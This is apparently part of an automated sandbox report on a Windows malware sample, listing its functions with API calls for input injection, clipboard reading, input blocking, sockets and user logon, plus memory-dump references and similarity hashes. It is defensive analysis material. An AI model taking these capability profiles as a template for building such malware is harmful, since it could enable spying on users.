                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3031425849-0
                                                                                                                                                                                                                                                            • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                                                                                                            • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                                                                                                                                                            Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4170576061-0
                                                                                                                                                                                                                                                            • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                                                            • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                                                                                                                                            Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                            • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0047A393
                                                                                                                                                                                                                                                            • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                            • Opcode ID: e73d6ad61345a6a69264b283110bd362a2875110283f9bbef61147e752cec385
                                                                                                                                                                                                                                                            • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e73d6ad61345a6a69264b283110bd362a2875110283f9bbef61147e752cec385
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                                                                                                                                            Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                            • String ID: .lnk
                                                                                                                                                                                                                                                            • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                            • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                                                                                                                                                            • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                                                                                                                                                            Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 15083398-0
                                                                                                                                                                                                                                                            • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                                                                                                            • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                                                                                                                                                            Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                                                                                                            • String ID: U$\
                                                                                                                                                                                                                                                            • API String ID: 4104443479-100911408
                                                                                                                                                                                                                                                            • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                                                                                                                            • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                                                                                                                                                                                                            Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3541575487-0
                                                                                                                                                                                                                                                            • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                                                                                                                                            • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                                                                                                                                                            Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Proc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2346855178-0
                                                                                                                                                                                                                                                            • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                                                                                                                                            • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                                                                                                                                                            Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                            • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                                                                                                                            • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                                                                                                                                                            Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LogonUser
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1244722697-0
                                                                                                                                                                                                                                                            • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                                                                                                            • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                                                                                                                                                            Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                                            • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                                                                                                            • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                                                                                                                                                            Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
